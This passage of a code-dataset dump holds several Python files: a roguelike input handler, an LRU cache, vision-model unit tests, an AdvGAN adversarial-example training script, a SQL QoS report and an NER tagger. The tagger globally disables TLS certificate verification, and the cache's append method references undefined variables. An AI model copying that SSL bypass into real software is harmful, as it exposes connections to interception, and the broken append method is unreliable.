[]\n\t\t\t\t\tself.inputs.buttons[\"return\"] = False\n\n\t\t\telif self.mode == \"restart\":\n\t\t\t\tself.startGame()\n\t\t\tself.inputs.raw_key = None\n\t\t\treturn task.cont\n\t\tprint(\"bye!\")\n\t\texit()\n\n\tdef input(self):\n\t\tact = self.act\n\t\ttile = self.map.grid[self.player.pos[1]][self.player.pos[0]]\n\t\tif act == False:\n\t\t\tif self.inputs.buttons[\"turn_left\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\telif self.inputs.buttons[\"turn_right\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(-1)\n\t\t\t\tself.actions.append((self.player.turn, -1))\n\t\t\telif self.inputs.buttons[\"forward\"]:\n\t\t\t\ten = self.player.move(-1)\n\t\t\t\tif not en == \"cancel\":\n\t\t\t\t\tif en == \"melee\":\n\t\t\t\t\t\tself.delay = 10\n\t\t\t\t\t\tself.player.stats.attack(self.player.target.stats, True)\n\t\t\t\t\t\tself.player.target.switchFrame(\"hurt\")\n\t\t\t\t\t\tself.transition.setFadeColor(0.1,0.1,0.1)\n\t\t\t\t\t\tself.transition.fadeOut(0.1)\n\t\t\t\t\t\tself.transition.fadeIn(0.01)\n\t\t\t\t\t\tself.hud.update()\n\t\t\t\t\t\tl = \"_a\", \"_b\", \"_c\"\n\t\t\t\t\t\tself.sounds[\"hit\"+choice(l)].play()\n\t\t\t\t\t\tact = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.actions.append((self.player.move,-1))\n\t\t\t\t\t\tact = True\n\t\t\telif self.inputs.buttons[\"backward\"]:\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\t\tself.player.turn(1)\n\t\t\t\tself.actions.append((self.player.turn, 1))\n\t\t\telif self.inputs.buttons[\"fire\"]:\n\t\t\t\tf = self.player.fire()\n\t\t\t\tif f:\n\t\t\t\t\tact = True\n\n\t\t\telif self.inputs.buttons[\"wait\"]:\n\t\t\t\tact = True\n\t\t\t\tself.sounds[\"turn\"].play()\n\t\t\t\tself.delay = 10\n\t\t\t\tself.hud.output.append(\"You wait.\")\n\t\t\telif self.inputs.buttons[\"take\"]:\n\t\t\t\tif not tile.item == None:\n\t\t\t\t\tabc = \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t\t\tif len(self.player.stats.inventory) < len(abc):\n\t\t\t\t\t\tself.sounds[\"select_b\"].play()\n\t\t\t\t\t\ttile.item[0].removeNode()\n\t\t\t\t\t\ti = tile.item[1]\n\t\t\t\t\t\tself.player.stats.inventory.append(i)\n\t\t\t\t\t\tself.hud.output.append(\"You found a \" + i.name)\n\t\t\t\t\t\ttile.item = None\n\t\t\t\t\t\tact = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.hud.output.append(\"You can't carry any more.\")\n\t\t\t\t\t\tself.delay = 10\n\t\t\telif self.inputs.buttons[\"stairs_down\"]:\n\t\t\t\tif tile.c == \"<\":\n\t\t\t\t\tself.nextLevel()\n\t\t\t\tself.inputs.buttons[\"stairs_down\"] = False\n\t\t\telif self.inputs.buttons[\"fullscreen\"]:\n\t\t\t\tif self.fullscreen:\n\t\t\t\t\tself.fullscreen = 0\n\t\t\t\telse:\n\t\t\t\t\tself.fullscreen = 1\n\t\t\t\tself.props.setFullscreen(int(self.fullscreen))\n\t\t\t\tbase.win.requestProperties(self.props)\n\t\t\t\tself.inputs.buttons[\"fullscreen\"] = False\n\t\t\telse:\n\t\t\t\tverbs = \"inventory\", \"drop\", \"throw\", \"eat\",\"quaff\", \"wield\", \"stats\", \"help\"\n\t\t\t\tfor i in self.inputs.buttons:\n\t\t\t\t\tif self.inputs.buttons[i]:\n\t\t\t\t\t\tif i in verbs:\n\t\t\t\t\t\t\tself.mode = \"inventory\"\n\t\t\t\t\t\t\tself.hud.inv(self.player, i)\n\t\t\t\t\t\t\tself.inputs.buttons[i] = False\n\t\tif act:\n\t\t\tself.act = False\n\t\t\tself.player.stats.turn()\n\t\t\tfor e, enemy in enumerate(self.map.enemies):\n\t\t\t\tif self.player.stats.speedboost <= 0 or randint(0,2) == 0:\n\t\t\t\t\ten = enemy.plan(self, e)\n\t\t\t\t\tif en:\n\t\t\t\t\t\tenemy.stats.turn()\n\t\t\t\t\t\tself.actions.append((enemy.move, self))\n\t\t\tself.player.stats.updateStats()\n\n\tdef update(self):\n\t\tself.player.update()\n\t\tfor enemy in self.map.enemies:\n\t\t\tenemy.update(self)\n\nasync def die():\n\tgame.transition.setFadeColor(1, 0, 0)\n\tawait game.transition.fadeOut(2)\n\tgame.startGame()\n","sub_path":"game/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"372769614","text":"class Node(object):\n \n def __init__(self, key, value, prev = None, next = None):\n self.key = key\n self.value = value\n self.prev = prev\n self.next = next\n\n # define __repr_ to decide what a print statement displays for a Node object\n def __repr__(self):\n return f\"Node(key: {self.key}, value: {self.value})\"\n \n def __str__(self):\n return f\"Node(key: {self.key}, value: {self.value})\"\n\n#create a DoublyLinkedList\n\nclass DLL(object):\n def __init__(self):\n self.head = None\n self.tail = None\n self.nodeCount = 0\n\n def removeNode(self,node) :\n\n if (node.prev != None):\n node.prev.next = node.next\n else:\n self.head = node.next\n \n\n if (node.next != None) :\n node.next.prev = node.prev\n else:\n self.tail = node.prev\n \n\n self.nodeCount -= 1\n\n def prependNode(self,node):\n\n node.next = self.head\n node.prev = None\n\n if (self.head != None):\n self.head.prev = node\n\n self.head = node\n\n if (self.tail == None):\n self.tail = self.head\n\n self.nodeCount += 1\n return node;\n\n \"\"\"\n adding a node with key and value to the top of the list\n \"\"\"\n def prepend(self, key, value): \n new_node = Node(key,value,None,None)\n \n return self.prependNode(new_node);\n\n \"\"\"\n adding a node with key and value to the bottom of the list\n \"\"\"\n def append(self, data):\n new_node = Node(key,value,None,None)\n\n if self.head is None:\n self.head = self.tail = new_node\n else:\n new_node.prev = self.tail\n new_node.next = None\n\n print(self.tail)\n\n self.tail.next = new_node\n self.tail = new_node\n self.nodeCount += 1\n return node;\n\n \"\"\"\n Displays data inside the linked list\n \"\"\"\n def printList(self):\n print (\"-\"*10)\n print (\"\\n\\nShow Doubly linked list data:\")\n print (\"-\"*30)\n current_node = self.head\n counter = 0;\n while current_node is not None:\n counter +=1;\n print (\"\\n\"),\n print (f\"{counter}:\"),\n print (f\"prev: {current_node.prev}\") if hasattr(current_node.prev, \"value\") else None,\n print (f\"current: {current_node}\"),\n print (f\"next: {current_node.next}\") if hasattr(current_node.next, \"value\") else None\n \n current_node = current_node.next\n print (\"-\"*30,\"\\n\\n\\n\")\n\n\"\"\"\nUse a dictionary to store pointers to nodes in the cache.\n\"\"\"\nclass LRU_Cache(DLL):\n\n def __init__(self, capacity = 0):\n # Initialize class variables\n self.capacity = capacity\n self.cStorage = {}\n\n # Called the DoublyLinkedList constructor\n super().__init__()\n\n\n def get(self,key):\n\n if key in self.cStorage:\n node = self.cStorage.get(key)\n self.removeNode(node)\n self.prependNode(node)\n return node.value\n \n return -1\n \n def set(self,key, value) :\n \"\"\"\n The key already exist, update its value and move the node to the top/front of the list\n \"\"\"\n if key in self.cStorage:\n node = self.cStorage.get(key)\n node.value = value\n self.removeNode(node)\n self.prependNode(node)\n else :\n \"\"\"\n The cache's maximum capacity has been reached \n remove the \"least recently used\" (oldest item) item from the cache by deleting it from linkedlist and from the hashmap\n \"\"\"\n if (len(self.cStorage) == self.capacity):\n del self.cStorage[self.tail.key]\n self.removeNode(self.tail)\n \n \"\"\"\n Add the new node to top/front of the list\n \"\"\" \n newnode = self.prepend(key,value)\n \n self.cStorage[key] = newnode\n\nif __name__ == '__main__':\n\t\n\t\"\"\"\n\t Add data to the cache in order to verify the values stored\n\t\"\"\"\n\tdef run_test():\n\t our_cache = LRU_Cache(5)\n\n\t our_cache.set(1, 1);\n\t our_cache.set(2, 2);\n\t our_cache.set(3, 3);\n\t our_cache.set(4, 4);\n\n\t print(our_cache.get(1)) # returns 1\n\t print(our_cache.get(2)) # returns 2\n\t print(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\t print(our_cache.get('')) # returns -1 because input is null\n\n\t # Move items in the cache, so that they are positioned closer to the top of the recently used list\n\t our_cache.set(5, 5) \n\t our_cache.set(6, 6)\n\n # returns -1 because 3 was the least recently used entry when the cache reached it's capacity, therfore it got deleted\n\t print(our_cache.get(3) ) \n\n\t print(\"Nodes in list: \",our_cache.nodeCount)\n\t \n\t print(list(our_cache.cStorage.keys()))\n\t # Uncomment our_cache.printList function to view the Doubly LinkedList\n\t #our_cache.printList()\n\n\trun_test()\n","sub_path":"Project 2/LRU_Cache/LRU_Cache.py","file_name":"LRU_Cache.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"2905832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport unittest\n\nimport numpy as np\nimport pandas as pd\nimport thingsvision.vision as vision\n\nfrom thingsvision.dataset import ImageDataset\nfrom torch.utils.data import DataLoader\n\nDEVICE = 'cpu'\nIN_PATH = './images92'\nOUT_PATH = './test'\nMODEL_NAMES = ['vgg16_bn', 'vgg19_bn']\nMODULE_NAMES = ['features.23', 'classifier.3']\nFILE_FORMATS = ['.npy', '.txt']\nBATCH_SIZE = 32\n\nclass ModelLoadingTestCase(unittest.TestCase):\n\n def test_mode_and_device(self):\n model, _ = vision.load_model(\n model_name=MODEL_NAMES[0],\n pretrained=True,\n device=DEVICE,\n )\n self.assertTrue(hasattr(model, DEVICE))\n self.assertFalse(model.training)\n\nclass ExtractionTestCase(unittest.TestCase):\n\n def test_extraction(self):\n model, transforms = vision.load_model(\n model_name=MODEL_NAMES[0],\n pretrained=True,\n device=DEVICE,\n )\n dataset = ImageDataset(\n root=IN_PATH,\n out_path=OUT_PATH,\n transforms=transforms,\n imagenet_train=None,\n imagenet_val=None,\n things=None,\n things_behavior=None,\n add_ref_imgs=None,\n )\n dl = DataLoader(\n dataset,\n batch_size=BATCH_SIZE,\n shuffle=False,\n )\n\n features, targets = vision.extract_features(\n model=model,\n data_loader=dl,\n module_name=MODULE_NAMES[0],\n batch_size=BATCH_SIZE,\n flatten_acts=False,\n device=DEVICE,\n )\n\n for format in FILE_FORMATS:\n vision.save_features(\n features=features,\n out_path=OUT_PATH,\n file_format=format,\n )\n self.assertEqual(features.shape[0], len(dataset))\n self.assertEqual(len(targets), features.shape[0])\n\n if MODULE_NAMES[0].startswith('classifier'):\n self.assertEqual(features.shape[1], model.classifier[int(MODULE_NAMES[0][-1])].out_features)\n\n self.assertTrue(isinstance(features, np.ndarray))\n self.assertTrue(isinstance(targets, np.ndarray))\n\nclass SlicingTestCase(unittest.TestCase):\n\n def test_slicing(self):\n features_npy = np.load(os.path.join(OUT_PATH, 'features.npy'))\n features_txt = vision.slices2tensor(OUT_PATH, 'features.txt')\n\n self.assertEqual(features_npy.shape, features_txt.shape)\n\nclass ComparisonTestCase(unittest.TestCase):\n\n def test_comparison(self):\n\n corr_mat = vision.compare_models(\n root=IN_PATH,\n out_path=OUT_PATH,\n model_names=MODEL_NAMES,\n module_names=MODULE_NAMES,\n pretrained=True,\n batch_size=BATCH_SIZE,\n flatten_acts=True,\n clip=[False, False],\n save_features=False,\n )\n self.assertTrue(isinstance(corr_mat, pd.DataFrame))\n self.assertEqual(corr_mat.shape, (len(MODEL_NAMES), len(MODULE_NAMES)))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"182531056","text":"import os\nimport argparse\n\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\n\nimport cifar10.cifar_loader as cifar_loader\nimport resnet\nfrom advGAN import AdvGAN_Attack\nfrom cifar10.cifar_resnets import resnet32\nfrom models import MNIST_target_net\nimport models\nuse_cuda = True\nimage_nc = 3\nbatch_size = 128\nBOX_MIN = 0\nBOX_MAX = 1\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', type=str, default='mnist', choices=['mnist', 'fashion-mnist', 'cifar10', 'cifar100', 'svhn', 'stl10', 'lsun-bed'],\n help='The name of dataset')\nparser.add_argument('--epoch', type=int, default=60, help='The number of epochs to run')\nparser.add_argument('--batch_size', type=int, default=128, help='The size of batch')\nparser.add_argument('--checkpoint',type=str,default='')\nparser.add_argument('--target_model',type=str,default=\"\")\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # Define what device we are using\n print(\"CUDA Available: \", torch.cuda.is_available())\n device = torch.device(\"cuda\" if (\n use_cuda and torch.cuda.is_available()) else \"cpu\")\n\n # net = resnet.ResNet18()\n # net = net.cuda()\n # net = torch.nn.DataParallel(net)\n # checkpoint = torch.load(\"H:/adversarial_attacks/pytorch-cifar/checkpoint/DataPackpt.pth\")\n # net.load_state_dict(checkpoint['net'])\n # target_model = net\n\n # resnet32\n if args.target_model == 'resnet32':\n target_model = cifar_loader.load_pretrained_cifar_resnet(flavor=32)\n elif args.target_model == 'resnet20':\n target_model = cifar_loader.load_pretrained_cifar_resnet(flavor=20)\n elif args.target_model == 'wideresnet':\n target_model = cifar_loader.load_pretrained_cifar_wide_resnet()\n elif args.target_model==\"mnist_2\":\n target_model = models.LeNet5()\n target_model.load_state_dict(torch.load('./trained_lenet5.pkl'))\n # target_model = target_model.cuda()\n # target_model.eval()\n\n # resnet32_advtrain\n # target_model = resnet32()\n # target_model.load_state_dict(torch.load('./advtrain.resnet32.000100.path.tar'))\n\n target_model = target_model.cuda()\n target_model.eval()\n\n model_num_labels = 10\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n transform = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ])\n # MNIST train dataset and dataloader declaration\n # mnist_dataset = torchvision.datasets.MNIST('./dataset', train=True, transform=transforms.ToTensor(), download=True)\n # transform = transforms.Compose([transforms.ToTensor()])\n # dataloader = DataLoader(\n # datasets.MNIST('./dataset/MNIST',\n # train=True, download=True, transform=transform), \n # batch_size=batch_size, shuffle=True)\n\n # cifar10\n dataloader = DataLoader(\n datasets.CIFAR10('../cifar-10-batches-py', train=True, download=True, transform=transform),\n batch_size=batch_size, shuffle=True)\n advGAN = AdvGAN_Attack(device,\n target_model,\n model_num_labels,\n image_nc,\n BOX_MIN,\n BOX_MAX,\n args)\n\n advGAN.train(dataloader, args.epoch)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"141568534","text":"class Girl:\r\n\t'constructor for class girl'\r\n\tdef __init__(self,name_id,attr,main_bgt,intlg,t):\r\n\t\tself.name_id=name_id\r\n\t\tself.attr=attr\r\n\t\tself.main_bgt=main_bgt\r\n\t\tself.intlg=intlg\r\n\t\tself.t=t\r\n\t\tself.status='single'\r\n\t\tself.happiness=0\r\n\t\tself.bf=''\r\n\t'couple formation condition'\r\n\tdef constraint(self,bgt):\r\n\t\tif(self.main_bgt>bgt):\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn True\r\n\t'set bf for girl if condition satisfies'\r\n\tdef set_bf(self,bf):\r\n\t\tself.bf=bf\r\n\t'set happiness'\r\n\tdef set_happiness(self,happiness):\r\n\t\tself.happiness=happiness\r\n\r\n\r\n\r\n","sub_path":"PPLq8/girl.py","file_name":"girl.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"122386405","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n This script compares the QoS data from table MOS_E2E_2 between two weeks\r\n to see an possible increase\r\n\"\"\"\r\n\r\n__author__ = \"Stuebner.Matthias\"\r\n__copyright__ = \"Copyright 2012, Stuebner.Matthias\"\r\n__credits__ = [\"Stuebner.Matthias\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"$Rev$\"\r\n__maintainer__ = \"Stuebner.Matthias\"\r\n__email__ = \"matthias.stuebner@kabeldeutschland.de\"\r\n__status__ = \"Alpha\"\r\n\r\nfrom config_file import config_na1 as database\r\nfrom datetime import date, timedelta\r\nimport Database.OracleSQLObj as oracle\r\nimport Tools.excel_read_write as xls\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\n\r\ndef processDelay(deltaListe):\r\n delayDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n delayDelta[k] = v[2]\r\n\r\n l = [x for x in delayDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg Delay-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung Delay: ',round(el[1],3))\r\n i=i+1\r\n \r\ndef processPloss(deltaListe):\r\n plossDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n plossDelta[k] = v[0]\r\n\r\n l = [x for x in plossDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg PLoss-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung PLoss: ',round(el[1],3))\r\n i=i+1\r\n \r\n\r\ndef processJitter(deltaListe): \r\n jitterDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n jitterDelta[k] = v[1]\r\n\r\n l = [x for x in jitterDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg Jitter-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung Jitter: ',round(el[1],3))\r\n i=i+1\r\n\r\ndef processMos(deltaListe):\r\n mosDelta = {}\r\n for k,v in deltaListe.iteritems():\r\n mosDelta[k] = v[3]\r\n\r\n l = [x for x in mosDelta.iteritems()]\r\n l = sorted(l,key=lambda x: x[1],reverse=True)\r\n\r\n print('\\nTOP10 Anstieg MOS-Violation Anstieg: ')\r\n i=0\r\n for el in l:\r\n if i < 11:\r\n print('CMTS: ',el[0],' Abweichung MOS: ',round(el[1],3))\r\n i=i+1\r\n\r\ndef buildData():\r\n sql = \"\"\"\r\nselect \r\n t1.*\r\nfrom\r\n(\r\n select \r\n WEEK,\r\n cmts_name,\r\n sum(\"Completed Calls with QoS (Nb)\"),\r\n sum(\"Bad Calls / MOS (Nb)\"),\r\n sum(\"Technical Failed Calls (Nb)\"),\r\n sum(\"Bad Calls / Packet Loss (Nb)\"),\r\n sum(\"Bad Calls / Jitter (Nb)\"),\r\n sum(\"Bad Calls / Delay (Nb)\"),\r\n round(sum(\"Bad Calls / Packet Loss (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"PacketLoss(%)\",\r\n round(sum(\"Bad Calls / Jitter (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Jitter(%)\",\r\n round(sum(\"Bad Calls / Delay (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Delay(%)\",\r\n round(sum(\"Bad Calls / MOS (Nb)\") / sum(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"BadMOS(%)\",\r\n ROUND(SUM(\"Technical Failed Calls (Nb)\") / SUM(\"Completed Calls with QoS (Nb)\") * 100, 3) as \"Techn_failed(%)\"\r\n from\r\n (\r\n select \r\n to_char(id_date,'IYIW') as WEEK\r\n ,m.*\r\n from MOS_E2E_2 m\r\n where \"Completed Calls with QoS (Nb)\" > 1000\r\n and \"Bad Calls / MOS (Nb)\" <> 0\r\n and to_char(id_date,'IYIW') >= to_char(sysdate-14,'IYIW')\r\n and to_char(id_date,'IYIW') < TO_CHAR(sysdate,'IYIW')\r\n )\r\n-- where cmts_name = 'hb-neue-cmts-13'\r\n group by \r\n WEEK,\r\n CMTS_NAME\r\n) t1\r\norder by week desc\r\n \"\"\"\r\n \r\n db = oracle.OracleSQL()\r\n res = db.executeSQL(sql)\r\n del db\r\n\r\n # Build dictionary of CMTS with one list per week\r\n cmtsListe = {}\r\n for i in range(len(res)):\r\n # res[0]: week\r\n # res[1]: cmts_name\r\n # res[8]: packetLoss_viol_rate\r\n # res[9]: jitter_viol_rate\r\n # res[10]: delay_viol_rate\r\n # res[11]: MOS_viol_rate\r\n \r\n ds = [res[i][0], # week\r\n res[i][8], # packetLoss_viol_rate\r\n res[i][9], # jitter_viol_rate\r\n res[i][10], # delay_viol_rate\r\n res[i][11]] # MOS_viol_rate\r\n if res[i][1] not in cmtsListe:\r\n cmtsListe[res[i][1]] = [ds]\r\n else:\r\n cmtsListe[res[i][1]].append(ds)\r\n\r\n # Build dictionary with CMTS and the delta of each value pair\r\n # positiver Wert: Verschlechterung\r\n deltaListe = {}\r\n for k, v in cmtsListe.iteritems():\r\n if len(v) == 2:\r\n deltaListe[k] = [v[0][1] - v[1][1]] # packetloss_viol_rate \r\n deltaListe[k] += [v[0][2] - v[1][2]] # jitter_viol_rate\r\n deltaListe[k] += [v[0][3] - v[1][3]] # delay_viol_rate\r\n deltaListe[k] += [v[0][4] - v[1][4]] # MOS_viol_rate\r\n\r\n return deltaListe\r\n\r\nif __name__ == '__main__':\r\n\r\n deltaListe = buildData()\r\n processDelay(deltaListe)\r\n processJitter(deltaListe)\r\n processPloss(deltaListe)\r\n processMos(deltaListe)\r\n\r\n# x = Excel_in_out()\r\n# x.write(data, filename=\"filename\", titleline=False)\r\n\r\n\r\n\r\n print('beendet')","sub_path":"naos-python/Source/MS/NHR/QoS-Veraenderung-zur-Vorwoche.py","file_name":"QoS-Veraenderung-zur-Vorwoche.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"653282619","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\ni = int(input())\nk=0\nl=list()\nwhile(k List[Token]:\n tagged_words = []\n i = 0\n print(\"words to tag: {}\".format(str(len(words))))\n for word in words:\n if self.__check_no_entity(word):\n tagged_words.append(Token(word.value, self.__tag_no_entity, word.pos_tagging))\n else:\n tag = self.__check_rules(word)\n tagged_words.append(Token(word.value, tag, word.pos_tagging))\n i += 1\n if i % 1000 == 0:\n print(i)\n return tagged_words\n\n def __check_no_entity(self, word: Token) -> bool:\n if word.value in self.stopwords_list:\n return True\n elif word.value in self.punctuation:\n return True\n else:\n return False\n\n def __check_rules(self, word: Token) -> str:\n keys = list(self.dictionary.keys())\n\n if word.pos_tagging in self.pos_tagging:\n if word.value in keys:\n return self.dictionary[word.value]\n else:\n tag = self.__tag_no_entity\n # found, tag = self.__check_distance(word, keys)\n # if found:\n # return tag\n # else:\n # found, tag = self.__check_word_stems(word, keys)\n\n else:\n tag = self.__tag_no_entity\n return tag\n\n def __check_distance(self, word: Token, keys) -> (bool, str):\n # calculate edit-distances\n relevant_keys = [k for k in keys if np.abs(len(k) - len(word.value)) < 4]\n\n if len(word.value) < 4:\n distance, index = self.__min_edit_distance(word, relevant_keys)\n\n if distance < round(math.floor(len(word.value)) * 0.9):\n return True, self.dictionary[relevant_keys[index]]\n else:\n return False, self.__tag_no_entity\n else:\n similarity, index = self.__max_jaccard_similarity(word, relevant_keys, 3)\n\n if similarity > 0.8:\n return True, self.dictionary[relevant_keys[index]]\n else:\n return False, self.__tag_no_entity\n\n @staticmethod\n def __min_edit_distance(word: Token, keys) -> (float, int):\n # calculate edit-distances\n distances = list(map(lambda x: edit_distance(word.value, x), keys))\n # get index where distance is minimal - conflict resolution happens here as we just pick first index_min\n index_min = min(range(len(distances)), key=distances.__getitem__)\n return distances[index_min], index_min\n\n @staticmethod\n def __max_jaccard_similarity(word: Token, keys, gram_number) -> (float, int):\n # calculate jaccard-distances\n distances = list(map(lambda x: jaccard_similarity(set(ngrams(word.value, gram_number)),\n set(ngrams(x, gram_number))), keys))\n index_max = max(range(len(distances)), key=distances.__getitem__)\n return distances[index_max], index_max\n\n def __check_word_stems(self, word, keys) -> (bool, str):\n stemmer = SnowballStemmer(\"english\")\n stemmed_word = stemmer.stem(word.value)\n stemmed_keys = list(map(lambda x: stemmer.stem(x), keys))\n\n if stemmed_word in stemmed_keys:\n idx = stemmed_keys.index(stemmed_word)\n return True, self.dictionary[keys[idx]]\n\n return False, self.__tag_no_entity\n\n\ndef jaccard_similarity(label1: set, label2: set) -> float:\n intersection_cardinality = (len(label1.union(label2)) - len(label1.intersection(label2)))\n union_cardinality = len(label1.union(label2))\n\n if intersection_cardinality > 0 and union_cardinality > 0:\n result = intersection_cardinality / float(union_cardinality)\n else:\n result = 0\n return result\n\n\ndef main():\n if len(sys.argv) < 2:\n input_file = \"./../data/uebung4-training.iob\"\n train_tagger(input_file)\n print('---- Training for NER-Tagger is finished ----')\n elif len(sys.argv) == 3:\n input_file = sys.argv[1]\n output_file = sys.argv[2]\n tag_tokens(input_file, output_file)\n print('---- NER-Tagger finished, see result in output file ----')\n else:\n print(sys.argv[1].lower())\n print('Oops, something went wrong, please check if you called the script correctly :)')\n\n\ndef train_tagger(input_file):\n gold_std, pos_taggings = build_dict_from_input_file(input_file)\n additional_dictionary = build_additional_dict(\"./../data/dictionary/human-genenames.txt\")\n dictionary = concatenate_dicts(gold_std, additional_dictionary)\n stopwords_list = build_stopwords()\n punctuation = set(string.punctuation)\n tagger = NERTagger(dictionary, stopwords_list, punctuation, pos_taggings)\n tagger.save_dictionaries()\n\n\ndef tag_tokens(input_file, output_file):\n tokens = read_tokens_from_input_file(input_file)\n tagger = NERTagger()\n tagged_list = tagger.tag_tokens(tokens)\n write_annotations_to_file(tagged_list, output_file)\n\n\ndef build_dict_from_input_file(path) -> (dict, set):\n entities_from_file = {}\n pos_taggings_from_file = []\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_input_file(f.readlines()):\n if token.tag != \"O\":\n entities_from_file[token.value] = token.tag\n pos_taggings_from_file.append(token.pos_tagging)\n return entities_from_file, set(pos_taggings_from_file)\n\n\ndef build_additional_dict(path: str) -> dict:\n entities_from_file = {}\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_list(f.readlines()):\n entities_from_file[token] = \"B-protein\"\n return entities_from_file\n\n\ndef concatenate_dicts(gold_std, additional_dict) -> dict:\n set1 = set(list(gold_std.items()))\n set2 = set(list(additional_dict.items()))\n set_conc = set1.union(set2)\n return dict(set_conc)\n\n\ndef build_stopwords() -> set:\n nltk.download('stopwords')\n stopwords_list = []\n path = \"./../data/dictionary/english_stop_words.txt\"\n with open(path, \"r\", encoding='latin-1') as f:\n for token in get_tokens_from_list(f.readlines()):\n stopwords_list.append(token)\n return set(stopwords_list).union(set(stopwords.words('english')))\n\n\ndef read_tokens_from_input_file(path) -> List[Token]:\n with open(path, \"r\", encoding='latin-1') as f:\n tokens = get_tokens_from_input_file(f.readlines())\n return tokens\n\n\ndef write_annotations_to_file(annotations: List[Token], output_file):\n my_file = open(output_file, 'w')\n for token in annotations:\n my_file.write(\"{}\\t{}\\n\".format(token.value, token.tag))\n my_file.close()\n\n\ndef get_tokens_from_list(lines) -> list:\n tokens = []\n for line in lines:\n if len(line) > 0:\n found_tokens = word_tokenize(line)\n if len(found_tokens) == 1:\n tokens.append(found_tokens[0])\n return tokens\n\n\ndef get_tokens_from_input_file(lines) -> List[Token]:\n words = []\n tags = []\n pos_taggings = []\n tokens = []\n # reading words / tags\n for line in lines:\n if len(line) > 0:\n found_tokens = word_tokenize(line)\n if len(found_tokens) == 2:\n words.append(found_tokens[0])\n tags.append(found_tokens[1])\n # reading pos-tags\n for pos_tagging in pos_tag(words):\n pos_taggings.append(pos_tagging[1])\n # concatenate all\n for i in range(len(words)):\n tokens.append(Token(words[i], tags[i], pos_taggings[i]))\n return tokens\n\n\nif __name__ == '__main__':\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n pass\n else:\n ssl._create_default_https_context = _create_unverified_https_context\n main()\n","sub_path":"tutorial_4/ner/uebung4-gruppe7.py","file_name":"uebung4-gruppe7.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
